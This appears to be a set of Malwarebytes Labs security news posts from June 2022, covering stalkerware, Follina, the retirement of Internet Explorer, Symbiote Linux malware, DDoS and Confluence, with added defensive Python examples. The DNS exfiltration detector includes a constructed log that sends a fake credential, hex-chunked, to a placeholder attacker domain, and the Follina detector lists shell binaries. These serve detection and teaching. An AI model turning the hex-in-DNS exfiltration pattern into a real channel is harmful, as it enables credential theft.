IT NEWS

Photos of kids taken from spyware-ridden phones found exposed on the internet

A stalkerware-type app that boasts “the best free phone spying software on the market” has exposed the data it snooped from the phones it was installed on. The data exposed by TheTruthSpy included GPS locations, photos from victims’ phones, and images of children and babies.

This news, first reported by Motherboard, is the latest in a lengthening list of spyware brands breached due to their poor cybersecurity hygiene. And TheTruthSpy is hardly the first of its kind to put kids’ data at risk.

The images exposed by TheTruthSpy were available to anyone who visited a particular URL on TheTruthSpy’s website. The photos included those of a young boy looking at the camera, a baby’s soiled diaper, a pet cat, and photos of the inside of someone’s home.

TheTruthSpy can be downloaded from the Google Play and Apple App stores. According to its website, it has 15+ features, including monitoring multiple communication apps, recording ambient voice, siphoning of photos, keylogging, and managing spying activities via a control panel. Any data retrieved from the target’s device is then uploaded to TheTruthSpy’s server, where clients can log in and view all collected data.

TheTruthSpy is maintained by 1Byte, a Vietnam-based company that handles multiple stalkerware-type apps. According to a Techcrunch exposé back in February, 1Byte was found exposing data from apps it manages due to a vulnerability in the app. It appears TheTruthSpy is suffering from the same flaw.

Stalkerware

Stalkerware is malicious in that it surreptitiously runs in the background while spying on people, usually without their knowledge.

Unlike other malware, it is also publicly available. Anyone with the means and intent can buy and use TheTruthSpy—all they need to do is download and install it onto target phones.

Not its first rodeo

This is the second time TheTruthSpy has had its data exposed. In 2018, a hacker going by the initials L.M. revealed to Motherboard how he had successfully infiltrated the stalkerware-type app’s servers to steal client data, and then lost that access after the company updated its servers.

“They take care about how to spy, and not take care about how they secure the attackers’ and victims’ privacy,” L.M. said at that time, criticizing TheTruthSpy for being untrue to its clients.

The post Photos of kids taken from spyware-ridden phones found exposed on the internet appeared first on Malwarebytes Labs.

It’s official, today you can say goodbye to Internet Explorer. Or can you?

Today, the Internet Explorer (IE) 11 desktop application goes out of support and will be retired for certain versions of Windows 10.

The retirement consists of two phases. During the first phase—the redirection phase—devices will be progressively redirected from IE to Microsoft Edge over the following months.

The second phase of retirement is the Windows Update phase. After the redirection phase completes, IE will be permanently disabled through a future Windows Update on all devices with Windows platforms that are in-scope for IE retirement.

History

Microsoft’s Internet Explorer 1.0 first loaded web pages in August 1995. In 2003, Microsoft said goodbye to the standalone version of the browser, but Internet Explorer continued as part of the evolution of the operating system, with updates coming bundled in operating system upgrades.

Over the following years, despite everything Microsoft tried, Chrome took over as the most used browser. With Windows 10, Edge became the default Microsoft browser, but Internet Explorer could still be found in the Windows Accessories folder.

While Edge started out based on Microsoft’s EdgeHTML browser engine, it later switched to a Chromium-based model.

After all this, Microsoft felt it was time to phase out Internet Explorer.

Platforms

For now the retirement is only partial, even for Windows 10. In scope at the time of this announcement:

Internet Explorer 11 desktop application delivered via the Semi-Annual Channel (SAC):

  • Windows 10 client SKUs
  • Windows 10 IoT

Out of scope at the time of this announcement (unaffected):

  • Internet Explorer mode in Microsoft Edge
  • Internet Explorer platform (MSHTML/Trident), including WebOC and COM automation
  • Internet Explorer 11 desktop application on:
    • Windows 8.1
    • Windows 7 Extended Security Updates (ESU)
    • Windows Server SAC (all versions)
    • Windows 10 IoT Long-Term Servicing Channel (LTSC) (all versions)
    • Windows Server LTSC (all versions)
    • Windows 10 client LTSC (all versions)
    • Windows 10 China Government Edition

In-market Windows 10 LTSC and Windows Server are also unaffected by this change. Windows Server 2022 and Windows 10 Enterprise LTSC 2021 are also out of scope.

The end

During the first phase, users will find themselves redirected from IE to Microsoft Edge. This will not happen for all devices at the same time, which gives organizations a chance to identify and resolve any potential issues, such as missed sites, before the redirection happens on all devices within an organization.

The second phase of retirement is the Windows Update phase. After the redirection phase completes, IE will be permanently disabled through a future Windows Update on all devices with Windows platforms that are in-scope for IE retirement.

Given the cumulative nature of Windows Updates, IE disablement will persist in subsequent Windows Updates.

For those who can’t wait to get rid of Internet Explorer, Microsoft has published a blog post explaining how to move forward. It’s also worth reading for system administrators who want to prepare for the second phase of the retirement process.

Not so much

Why not uninstall IE entirely, you may wonder. This isn’t recommended as Internet Explorer mode relies on Internet Explorer 11 to function. IE mode on Microsoft Edge makes it easy to use all of the sites your organization needs in a single browser. It uses the integrated Chromium engine for modern sites, and it uses the Trident MSHTML engine from Internet Explorer 11 for legacy sites.

Support for IE mode follows the lifecycle of current and future Windows client, Windows server, and Windows IoT releases (including Windows 11) at least through 2029.

Security angle

While your first response to the news might have been a sigh of relief, the stage exit of Internet Explorer does not bring any immediate security improvements. The holy grail of backward compatibility has thrown a wrench in the Microsoft works before and it will probably continue to do so, as long as we are afraid to say goodbye to legacy technology in a decisive manner.

Switching to a more secure platform makes all kinds of sense, but it is held back if we keep on using the old, less secure platform on the side. Threat actors will prey on the old platform as long as it is in use.

Researchers will keep finding vulnerabilities in Internet Explorer-related files that need to stay on the system even when nobody uses Internet Explorer anymore. And system administrators will find endpoints and/or users that need to keep Internet Explorer because some legacy resource requires it.


Update now! Microsoft patches Follina, and many other security updates

The June 2022 Patch Tuesday may go down in history as the day that Follina got patched, but there was a host of other important updates. And not just from Microsoft. Many other software vendors follow the pattern of monthly updates set by the people in Redmond.

Microsoft

Microsoft released updates to deal with 60 security vulnerabilities. Undoubtedly the most prominent is the one that goes by the name of Follina. Five of the patched vulnerabilities were in the Edge browser.

Follina, or CVE-2022-30190

A quick recap about Follina. On Monday May 30, 2022, Microsoft issued CVE-2022-30190 regarding a vulnerability in the Microsoft Support Diagnostic Tool (MSDT) in Windows. An in-the-wild exploit used a feature in Word to retrieve an HTML file from a remote server, and that HTML file in turn used MSDT to load code and execute PowerShell commands.
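The chain just described (Office application launches msdt.exe, msdt.exe launches PowerShell) is what a defender can look for in process-creation telemetry. The following is an added example written for this post, not Microsoft’s guidance: it runs over constructed Sysmon-style events, and every pid, path and command-line argument in it is made up.

```python
"""Detect the Follina (CVE-2022-30190) execution chain described above:
an Office application launches msdt.exe, and msdt.exe goes on to launch
PowerShell. Input is a list of process-creation events in the shape of
Sysmon Event ID 1 records. Added example, not Microsoft's guidance; the
events at the bottom are constructed, not real telemetry."""
from dataclasses import dataclass
from typing import Dict, List

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str


def image_name(image: str) -> str:
    """Lower-cased file name of an image path, Windows or POSIX separators."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_follina_chains(events: List[ProcEvent]) -> List[Dict]:
    """Return one finding per msdt.exe whose parent is an Office app.

    A shell child of that msdt.exe raises the severity to high: that is
    the full Word -> MSDT -> PowerShell chain from the in-the-wild exploit.
    msdt.exe started from elsewhere (e.g. a user running a troubleshooter
    from Explorer) is not reported.
    """
    by_pid = {e.pid: e for e in events}
    children: Dict[int, List[ProcEvent]] = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)

    findings = []
    for e in events:
        if image_name(e.image) != "msdt.exe":
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or image_name(parent.image) not in OFFICE_APPS:
            continue
        shells = [c for c in children.get(e.pid, [])
                  if image_name(c.image) in SHELLS]
        findings.append({
            "office_pid": parent.pid,
            "office_image": image_name(parent.image),
            "msdt_pid": e.pid,
            # the ms-msdt: URI scheme is what the crafted HTML hands to MSDT
            "msdt_uri_in_cmdline": "ms-msdt:" in e.cmdline.lower(),
            "shell_pids": [c.pid for c in shells],
            "severity": "high" if shells else "medium",
        })
    return findings


# Constructed sample events (pids, paths and arguments are made up).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # Benign: a user opens a troubleshooter from Explorer.
    ProcEvent(150, 100, r"C:\Windows\System32\msdt.exe",
              "msdt.exe CONSTRUCTED-TROUBLESHOOTER-ARGS"),
    ProcEvent(200, 100, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              '"WINWORD.EXE" invoice.docx'),
    # Suspicious: Word launches MSDT via the ms-msdt: handler ...
    ProcEvent(300, 200, r"C:\Windows\System32\msdt.exe",
              'msdt.exe "ms-msdt:/id CONSTRUCTED-PLACEHOLDER-ARGS"'),
    # ... and MSDT launches PowerShell.
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -Command CONSTRUCTED-PLACEHOLDER"),
]

if __name__ == "__main__":
    for finding in find_follina_chains(SAMPLE_EVENTS):
        print(finding)
```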

CVE-2022-30136

Another critical vulnerability is CVE-2022-30136, a bug in NFS 4.1 that could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger Remote Code Execution (RCE). This vulnerability concerns a number of Windows Server products and received a CVSS score of 9.8 out of 10. Last month, Microsoft fixed a similar vulnerability (CVE-2022-26937) affecting NFS v2.0 and v3.0.

CVE-2022-30139

Also in this batch is CVE-2022-30139, a Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution (RCE) vulnerability. This vulnerability is only exploitable if the MaxReceiveBuffer LDAP policy is set to a value higher than the default. LDAP is a software protocol that lets anyone locate data about organizations, individuals and other resources such as files and devices in a network. LDAP is a “lightweight” (smaller amount of code) version of the Directory Access Protocol (DAP). In total, seven vulnerabilities in LDAP were found and fixed.

CVE-2022-30163

Noteworthy as well is CVE-2022-30163, a Windows Hyper-V Remote Code Execution vulnerability that allows an attacker to run a specially crafted application on a Hyper-V guest that could cause the Hyper-V host operating system to execute arbitrary code. Microsoft Hyper-V is a virtualization platform that enables administrators to run multiple virtualized operating systems on the same physical server simultaneously.

More Microsoft news

Microsoft has also started to phase out Internet Explorer, but more about that in a separate post.

And then there was a storm of criticism about the way Microsoft handled the SynLapse vulnerability in Azure Data Factory and Azure Synapse Pipelines. SynLapse is the name for a critical bug in Azure’s Synapse service that allowed attackers to obtain credentials to other workspaces, execute code, or leak customer credentials to data sources outside of Azure. Rather than dealing with the vulnerability in a way that closed the gap once and for all, Microsoft chose what researchers called a halfhearted fix that was easily bypassed in a subsequent attempt. Orca researchers said they were able to bypass Microsoft’s fix for the issue twice before the company put a working fix in place.

Other vendors

Adobe has released security updates to address vulnerabilities in multiple products.

Atlassian released a patch for the actively exploited Confluence RCE vulnerability.

Citrix fixed two vulnerabilities in Citrix ADM server and Citrix ADM agent.

Drupal fixed two “Moderately critical” vulnerabilities.

GitLab released versions 15.0.1, 14.10.4, and 14.9.5 for GitLab Community Edition (CE) and Enterprise Edition (EE).

Google put out updates for Android and Chrome.

SAP published security notes about some high priority vulnerabilities.

Stay safe, everyone!


Firefox stops advertisers tracking you as you browse, calls itself the most “private and secure major browser”

Cookies are in the news as Mozilla rolls out significant privacy changes for Firefox. The idea is to dramatically lessen the risk of privacy-invading tracking across websites without your knowledge. Tracking cookies have been a hot topic in recent months, as advertisers try switching to other methods of tracking. Will this make a noticeable difference to people’s everyday browsing experience?

What are cookies?

Cookies are pieces of information which websites can save in your browser. A site you visit can ask your browser to save a cookie whenever the browser requests something from it: a picture, a download, page content, pretty much anything at all. The browser will keep the cookie and send it back to the website with every subsequent request until the cookie expires.

Expires? That’s right. Some cookies, called session cookies, expire once you close the browser. Others, persistent cookies, will remain on board until they eventually expire or you manually delete them. Humorously, some sites allow you to permanently opt-out of cookies and tracking by…asking you to accept permanent cookies which never expire.

Forget me not…but only sometimes

But how do these cookies, session or persistent, actually work?

Browsers and websites converse in a “stateless” fashion. Every message sent is isolated from all of the other messages. There’s no link to join any of these messages up, and that’s where cookies come into play. Cookies act like a sort of bridge for many day-to-day tasks inside your browser. Websites send browsers cookies, known as first-party cookies, tied to a unique ID the first time they converse. The browser fires the unique ID back at the website as these messages continue to be sent.

Through this, the sites you use are able to keep you logged in, remember what you’ve done, and keep the site functional for your specific needs. While sites can read their own cookies, they can’t read cookies from other websites. This is where third-party cookies come into play.

Third party tracking: An advertiser’s dream

A first-party cookie on a website has been placed there by the website itself. A third-party cookie is set by someone else, like an advertiser or ad network, via code embedded into the page. That cookie is designed to essentially follow you around the internet. This is why you start one day on a website offering up deals on movies you’re interested in, and then see adverts for those films at a cheaper price on another site the day after.

Slowly but surely, ad networks build up an incredibly accurate advertising profile of you as you move from one site to another. Depending on what’s being collected, you may end up with a huge slice of identifiable data tagged to your identity without you ever even seeing it yourself. It’s just there, and there’s not much you can do about it.

The cookie controversy

Third party cookies are not particularly popular. Ad tracking generally, even less so. Numerous questions of privacy and safety exist. Something else which exists: big fines. Not so long ago, Google and Facebook received fines for $157 million and $62 million respectively. This was for making cookies easier to accept than refuse.

Elsewhere, replacements of varying effectiveness have been proposed. Apple blocks tracking by default across its platforms. Google plans to ditch third-party cookies in Chrome by the end of next year. The Brave browser is already taking action against something called bounce tracking.

With all this in mind: What is Mozilla doing?

Hands off the cookie jar

Users of Firefox will now find something called Total Cookie Protection ticking along in the background. Mozilla claims that this release makes Firefox:

The most private and secure major browser available across Windows, Mac, and Linux. Total Cookie Protection is Firefox’s strongest privacy protection to date, confining cookies to the site where they were created, thus preventing tracking companies from using these cookies to track your browsing from site to site.

Total Cookie Protection creates individual “cookie jars” for every website you browse. Trackers are no longer able to thread that analytics picture across the web. What you get up to on one site stays on one site. As a result, tracking/advertising services can no longer watch from afar as you move from URL to URL. Your analytics profile is no longer quite as useful to advertisers as it once was.

Those cookies are still able to provide analytics in terms of the site they’re on. The difference is they’re no longer as invasive in terms of building a big picture of your internet activities.

This new stack of cookie jars is in addition to a number of other privacy features already up and running, including Enhanced Tracking Protection. Around since 2018, ETP blocks trackers from a maintained list. If a party is on the list, they lose the ability to use third-party cookies.
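To make the difference between one shared tracker cookie and a cookie jar per site concrete, here is an added example written for this post, not Mozilla’s code: a small model of browser cookie storage in classic and partitioned mode, with a constructed tracker host and constructed site names.

```python
"""Model of first-party vs third-party cookies and what Total Cookie
Protection changes. Added example: a simplified model of browser cookie
storage written for this post, not Firefox code. Site and tracker host
names are constructed."""
from collections import defaultdict
from typing import Dict, List, Tuple


class CookieStore:
    """Minimal browser cookie storage.

    Classic mode keys cookies only by the host that set them, so a tracker
    embedded in many sites reads back one shared cookie everywhere.
    Partitioned mode (one "cookie jar" per site) keys them by
    (top-level site, setting host): the tracker's cookie set while you were
    on shop.example is invisible while you are on news.example.
    """

    def __init__(self, partitioned: bool):
        self.partitioned = partitioned
        self._jars: Dict[Tuple[str, str], Dict[str, str]] = defaultdict(dict)

    def _key(self, top_level: str, host: str) -> Tuple[str, str]:
        return (top_level if self.partitioned else "", host)

    def set_cookie(self, top_level: str, host: str, name: str, value: str) -> None:
        self._jars[self._key(top_level, host)][name] = value

    def get_cookies(self, top_level: str, host: str) -> Dict[str, str]:
        # A host only ever sees cookies it set itself: the key includes the host.
        return dict(self._jars.get(self._key(top_level, host), {}))


class Tracker:
    """An ad network embedded as a third party on many sites. On every
    request it reads its cookie; if none comes back it mints a visitor ID."""

    def __init__(self, host: str = "ads.example"):
        self.host = host
        self._next_id = 1
        self.profile: Dict[str, List[str]] = defaultdict(list)

    def serve(self, store: CookieStore, top_level: str) -> str:
        vid = store.get_cookies(top_level, self.host).get("uid")
        if vid is None:
            vid = f"uid-{self._next_id}"
            self._next_id += 1
            store.set_cookie(top_level, self.host, "uid", vid)
        self.profile[vid].append(top_level)   # what the tracker learns
        return vid


def browse(partitioned: bool, sites: List[str]) -> Tuple[CookieStore, Tracker]:
    """Visit each site in turn; each page sets its own first-party session
    cookie and embeds the tracker as a third party."""
    store = CookieStore(partitioned)
    tracker = Tracker()
    for site in sites:
        store.set_cookie(site, site, "session", f"s-{site}")
        tracker.serve(store, site)
    return store, tracker


# Constructed browsing history; the return visit to shop.example shows that
# per-site analytics still work under partitioning.
SITES = ["shop.example", "news.example", "movies.example", "shop.example"]

if __name__ == "__main__":
    for mode in (False, True):
        _, tracker = browse(mode, SITES)
        print("partitioned" if mode else "classic", dict(tracker.profile))
```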

A cookie clean up

No matter which browser you use, an occasional cookie clean up is a good idea. Check out our post on removing cookies, which covers removal instructions for Chrome, Firefox, Edge, Opera, Safari, and several mobile browsers too.


Record breaking HTTPS DDoS attack

Last week, Cloudflare blocked the largest HTTPS DDoS attack on record. The attack amassed some 26 million requests per second (rps). The previous record for an HTTPS DDoS attack was 15.3 million rps.

The attack targeted an unnamed Cloudflare customer and originated mostly from Cloud Service Providers.

DDoS over HTTPS

DDoS stands for Distributed Denial of Service. This type of attack involves sending large amounts of traffic from multiple sources to a service or website, intending to overwhelm it and make it inaccessible for regular users. DDoS attacks have been growing considerably in number and scale over the past years.

DDoS attacks require traffic to come from many sources. Large numbers of sources can be found in IoT botnets, but given the computational resources needed to pull off an attack this powerful, no IoT botnet is strong enough. This attack originated from a small but powerful botnet of 5,067 devices. This, and the fact that the attack originated from Cloud Service Providers, indicates the use of hijacked virtual machines and powerful servers to generate the attack.

What makes an HTTPS DDoS attack more expensive, in terms of required computational resources, is that every request needs a TLS-encrypted connection. The advantage for the attacker is that it also costs the victim more to mitigate.

The attack

Within less than 30 seconds, this botnet generated more than 212 million HTTPS requests from over 1,500 networks in 121 countries.

Even though 30 seconds is not that long, such an attack can disrupt an unprotected internet property like a network or online service for a long time. DDoS attacks can cripple some online businesses for a period of time long enough to set them back considerably, or even put them out of business completely for the length of the attack and some period afterwards.

Without knowing who the target was it is hard to guess at the reason behind the attack. Application-layer denial-of-service attacks disrupt web servers and other kinds of networked software by making them unable to process legitimate requests.

The goal usually is the disruption itself or to abuse the vulnerable state in which it leaves the internet property.

Good news

International cooperation between the Federal Bureau of Investigation (FBI), the United Kingdom National Crime Agency, and the Dutch Police has brought an end to a DDoS platform that gave threat actors short-term access to malicious infrastructure, letting them rent and select the DDoS attacks they wanted to launch. In this case an Illinois man running the websites DownThem.org and AmpNode.com was sentenced to 24 months in federal prison.

“Records from the DownThem service revealed more than 2,000 registered users and more than 200,000 launched attacks, including attacks on homes, schools, universities, municipal and local government websites, and financial institutions worldwide.”

The system was set up to use one or more of their own dedicated attack servers to appropriate the resources of hundreds or thousands of other servers connected to the internet in reflected amplification attacks.

A reflection amplification attack is a technique that allows attackers to both magnify the amount of malicious traffic they can generate and obscure the sources of the attack traffic.

Mitigation

Scrambling for a solution at the moment you find out that you are the target of a DDoS attack is not the best strategy, especially if your organization depends on internet-facing servers. Without an automated defense, the attack would very likely have ended even before you noticed. But the damage would have been done.

Ideally, you want to detect, identify, and mitigate DDoS attacks before they reach their target. You can do that through two types of defenses:

  • On-premise protection (e.g. identifying, filtering, detection, and network protection)
  • Cloud-based counteraction (e.g. deflection, absorption, rerouting, and scrubbing)

The best of both worlds is a hybrid solution that detects an attack on-premise early on and escalates to a cloud-based solution when it reaches a volume that the on-premise solution cannot handle.

Stay safe, everyone!


Stealthy Symbiote Linux malware is after financial institutions

Symbiote, a new “nearly impossible to detect” Linux malware, targeted financial sectors in Latin America—and the threat actors behind it might have links to Brazil. These findings were revealed in a recent report, a joint effort between the Blackberry Research Team and Dr. Joakim Kennedy, a security researcher with Intezer.

Despite its name, this Trojan—first seen in November 2021—is more parasitic than a mutual benefactor in a symbiosis, according to Dr. Kennedy. And this is what sets Symbiote apart from other Linux malware.

“[I]t needs to infect other running processes to inflict damage on infected machines. Instead of being a standalone executable file that is run to infect a machine, it is a shared object (SO) library that is loaded into all running processes using LD_PRELOAD (T1574.006), and parasitically infects the machine.

Once it has infected all the running processes, it provides the threat actor with rootkit functionality, the ability to harvest credentials, and remote access capability.”

This abuse of the LD_PRELOAD environment variable appears to be the “LD_PRELOAD trick” described in this post. Since Symbiote is a shared object, the threat actor can set LD_PRELOAD to its path. In effect, the malicious library is loaded before any other shared object. And because it’s loaded first, Symbiote can “hijack the imports” from other SO files.

This enables it to hide on infected Linux machines.

[Figure: Symbiote’s evasion techniques (Source: Blackberry Threat Vector Blog)]

Symbiote: the hows and whys of its ways

Once all processes have been infected, the Linux machine is fully compromised. Symbiote then uses its rootkit capabilities to hide itself, any other malware the threat actor may have dropped onto the device, its processes, and its network artifacts. This makes detection and live forensic examination difficult.

Symbiote also offers threat actors a backdoor to the infected Linux machine, to which they can log in as a user with the highest privilege using a hardcoded password.

Per Dr. Kennedy, one notable aspect of Symbiote is its Berkeley Packet Filter (BPF) hooking functionality, which it uses to hide malicious traffic on an infected Linux machine. For a threat actor, this is an effective way to avoid alerting system admins to any network shenanigans, as Symbiote can filter its own suspicious traffic out of packet captures taken on the infected host.

As a credential stealer, though, Symbiote has to do more than stay hidden.

“The malware’s objective, in addition to hiding malicious activity on the machine, is to harvest credentials and provide remote access for the threat actor. The credentials are first encrypted with RC4 using an embedded key, and then written to a file.

In addition to storing the credentials locally, the credentials are exfiltrated. The data is hex encoded and chunked up to be exfiltrated via DNS address record requests to a domain name controlled by the threat actor.”
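The exfiltration channel just quoted (hex-encoded, chunked data in DNS A-record queries) is something a defender can look for from the network side, which matters because Symbiote’s BPF hooking hides traffic from captures taken on the infected host itself. The following is an added example written for this post, not from the Blackberry/Intezer report: the log format, the assumed chunk shape, the attacker domain and the leaked data are all constructed.

```python
"""Detection logic for the Symbiote exfiltration channel described above:
harvested credentials are hex encoded, chunked and sent as DNS A-record
queries to an attacker-controlled domain. Added example, not from the
Blackberry/Intezer report. Because Symbiote's BPF hooking hides traffic on
the infected host, the intended input is a resolver or network DNS log,
not a capture taken on the box. The log format, chunk shape and log lines
below are constructed."""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Assumed chunk shape: a label of 8..63 lowercase hex characters.
HEX_LABEL = re.compile(r"^[0-9a-f]{8,63}$")
# Constructed log line shape: "<timestamp> <client-ip> query[A] <qname>"
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) query\[A\] (?P<qname>\S+)$")


def parse_log(lines: List[str]) -> List[Dict[str, str]]:
    records = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            records.append(m.groupdict())
    return records


def hex_labels(qname: str) -> List[str]:
    """Leading labels of a query name that look like hex chunks."""
    chunks = []
    for label in qname.rstrip(".").split("."):
        if HEX_LABEL.match(label.lower()):
            chunks.append(label.lower())
        else:
            break
    return chunks


def registered_domain(qname: str) -> str:
    """Last two labels; good enough for this demo (no public-suffix list)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def find_hex_dns_exfil(lines: List[str], min_queries: int = 3) -> Dict[Tuple[str, str], dict]:
    """Group hex-labelled A queries by (client, domain). A client that sends
    at least min_queries of them to one domain is flagged, and the chunks are
    concatenated and hex-decoded (assuming in-order arrival) so an analyst
    can see what left the machine."""
    groups: Dict[Tuple[str, str], List[str]] = defaultdict(list)
    for rec in parse_log(lines):
        chunks = hex_labels(rec["qname"])
        if chunks:
            groups[(rec["src"], registered_domain(rec["qname"]))].append("".join(chunks))
    findings = {}
    for key, chunks in groups.items():
        if len(chunks) < min_queries:
            continue
        hexdata = "".join(chunks)
        raw = bytes.fromhex(hexdata) if len(hexdata) % 2 == 0 else b""
        findings[key] = {"queries": len(chunks), "bytes": len(raw),
                         "decoded": raw.decode("latin-1")}
    return findings


# --- constructed sample: an infected host leaking a fake credential line ---
_SECRET = b"user=dbadmin password=CONSTRUCTED-EXAMPLE"
_CHUNKS = [_SECRET.hex()[i:i + 32] for i in range(0, len(_SECRET.hex()), 32)]
SAMPLE_LOG = (
    ["2022-06-10T12:00:00Z 10.0.0.5 query[A] www.example.org"]
    + [f"2022-06-10T12:00:0{i + 1}Z 10.0.0.5 query[A] {c}.attacker-placeholder.example"
       for i, c in enumerate(_CHUNKS)]
    + ["2022-06-10T12:00:09Z 10.0.0.7 query[A] cdn.example.net"]
)

if __name__ == "__main__":
    for key, finding in find_hex_dns_exfil(SAMPLE_LOG).items():
        print(key, finding)
```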

The researchers further report that Symbiote impersonated Brazilian bank websites, suggesting Brazilians are the target of this campaign. The IP address of these domains is linked to the Njalla Virtual Private Server (VPS) service. Furthermore, “Passive DNS records showed that the same IP address was resolved to ns1[.]cintepol[.]link and ns2[.]cintepol[.]link a few months earlier.”

Cintepol is said to be the intelligence portal of the Federal Police of Brazil, which allowed its police officers to access intelligence from the federal police when investigating. This fake Cintepol site was abandoned in January 2022 in favor of another domain pointing to another Njalla VPS IP.

Protect against Symbiote

The threat actors behind Symbiote put a lot of effort into making it as under-the-radar as possible. However, Vulcan Cyber’s Mike Parkin, senior technical engineer, said in an interview with Dark Reading that the evasion tactics in Symbiote can still be detected by other network monitoring tools that can pinpoint malicious traffic and the infected Linux system.

Parkin further added that several endpoint tools should be able to identify malicious changes on infected systems.

“There are also forensic techniques that can use the malware’s own behavior against it to reveal its presence,” Parkin noted. “They leveraged a combination of techniques, though in so doing delivered some indicators of compromise that defenders could use to identify an infection in-situ.”

The Blackberry and Intezer report contains many indicators of compromise (IOCs) that IT admins should use to beef up the security of their Linux boxes.

You can also read our article on Malwarebytes’ EDR for Linux.


Introducing Malwarebytes Vulnerability Assessment for OneView: How to check for Common Vulnerabilities and Exposures (CVEs)

Malwarebytes is happy to announce our Vulnerability Assessment module for OneView, our multi-tenant console where you can manage Malwarebytes Nebula accounts, subscriptions, invoicing, and integrations. 

This module enables our MSPs to scan, identify, and assess vulnerabilities in customers’ digital ecosystems using our single lightweight agent.  

Here are some key benefits:

  • Automatically identify vulnerabilities via scheduled or manual scans
  • Deliver key insights and remediation steps for vulnerabilities; prioritized by severity level
  • Stay informed with customizable notifications when new vulnerabilities are discovered
  • Detailed vulnerability dashboards for a high-level view of all your customers

In this post, we’ll give you a step-by-step on how to complete an inventory and vulnerability scan in Malwarebytes Vulnerability Assessment for OneView.


Part 1: Selecting endpoints 

To conduct a vulnerability scan, start by clicking “Endpoints” in the left hand navigation bar. 


Select the site or individual endpoints you wish to scan.


Part 2: Scanning inventory and vulnerabilities

Once you have selected an endpoint, click the kebab menu in the upper right-hand corner. 


Click “Scan Inventory & Vulnerability” in the middle.


Click “Accept” in the confirmation window.


Part 3: Viewing CVEs

We can see the results of our scan by clicking the “Vulnerabilities” tab.


Selecting any of these CVEs will open a slide-out panel with more information. At the top, you’ll see remediation steps (most likely telling you to update to the latest version) and a link of references for further reading. 

Below, you’ll find a list of all the affected endpoints and applications. 


Part 4: Scheduling a scan

You can also schedule a vulnerability scan to keep reports updated automatically. 

In this section, follow along with the screenshots to learn how to schedule a vulnerability scan.


Update the schedule type to “Software Inventory Scan”.


Select if this is a Global schedule or for a specific site. For this demo, we’ll choose Global.


Scan, identify, and assess customer vulnerabilities with Malwarebytes Vulnerability Assessment for OneView

We’ve given you a brief overview of how to check for (and schedule!) Common Vulnerabilities and Exposures (CVEs) using Malwarebytes Vulnerability Assessment for OneView.

Want to learn more about Malwarebytes Vulnerability Assessment for OneView? Read the data sheet.


“Multiple adversaries” exploiting Confluence vulnerability, warns Microsoft

Microsoft has warned that “multiple adversaries and nation-state actors” are making use of the recent Atlassian Confluence RCE vulnerability. A fix is now available for CVE-2022-26134. It is essential users of Confluence address the patching issue immediately.

Confluence vulnerability: Background

At the start of June, researchers discovered a vulnerability in Atlassian Confluence via an incident response investigation. Confluence, a Wiki-style collaboration tool, experienced a “critical unauthenticated remote code execution vulnerability”. It affected Confluence server and Confluence Data Center.

The attack discovered during the investigation revealed web shells deployed on the server. These web shells allow for persistent access to compromised web applications. The web server process and its child processes ran as root with full privileges. This is very bad news, as it allowed for execution of commands even without valid credentials.

Worse, the web shell found is one commonly used by various Advanced Persistent Threat (APT) groups. This almost certainly isn’t the kind of thing admins discovering an attack want to hear mid-investigation.

Unfortunately, mitigation advice was somewhat limited. It ranged from restricting access to simply turning off Confluence Server and Data Center instances. On June 3, Atlassian released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1, which contain a fix for this vulnerability.
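Given that list of fixed releases, the practical defender task is to triage an inventory of Confluence instances by branch. Here is an added example written for this post, not an Atlassian tool, with constructed host names and versions; it assumes a version is fixed when it is at or above the listed release of its own major.minor branch, treats branches newer than 7.18 as shipped after the fix, and treats every branch without a listed release (older than 7.4, or 7.5 through 7.12) as vulnerable.

```python
"""Triage an inventory of Confluence versions against the fixed releases the
post lists for CVE-2022-26134. Added example, not an Atlassian tool.
Assumptions: a version is patched if it is at or above the fixed release of
its own major.minor branch; branches newer than the newest listed one
(7.18) shipped after the fix and are treated as patched; every other branch
(older than 7.4, or between listed branches such as 7.5 through 7.12) has no
fixed release in the list and is treated as vulnerable."""
from typing import Dict, Tuple

FIXED_VERSIONS = ["7.4.17", "7.13.7", "7.14.3", "7.15.2", "7.16.4", "7.17.4", "7.18.1"]


def parse_version(text: str) -> Tuple[int, ...]:
    """'7.13.7' -> (7, 13, 7); tuples compare numerically, so 7.13.10 > 7.13.7."""
    return tuple(int(part) for part in text.strip().split("."))


FIXED_BY_BRANCH: Dict[Tuple[int, ...], Tuple[int, ...]] = {
    v[:2]: v for v in map(parse_version, FIXED_VERSIONS)
}
NEWEST_FIXED_BRANCH = max(FIXED_BY_BRANCH)   # (7, 18)


def is_patched(version: str) -> bool:
    v = parse_version(version)
    branch = v[:2]
    if branch in FIXED_BY_BRANCH:
        return v >= FIXED_BY_BRANCH[branch]
    # No listed fix for this branch: only branches newer than 7.18 are safe.
    return branch > NEWEST_FIXED_BRANCH


def triage(inventory: Dict[str, str]) -> Dict[str, str]:
    """Map host -> verdict for a {host: version} inventory."""
    verdicts = {}
    for host, version in inventory.items():
        if is_patched(version):
            verdicts[host] = "patched"
        else:
            target = FIXED_BY_BRANCH.get(parse_version(version)[:2])
            hint = ".".join(map(str, target)) if target else "a fixed release"
            verdicts[host] = f"VULNERABLE: upgrade to {hint}"
    return verdicts


# Constructed host names and versions (not a real inventory).
SAMPLE_INVENTORY = {
    "wiki-prod.example": "7.13.7",
    "wiki-old.example": "7.12.5",
    "wiki-dev.example": "7.18.0",
    "wiki-new.example": "7.19.2",
}

if __name__ == "__main__":
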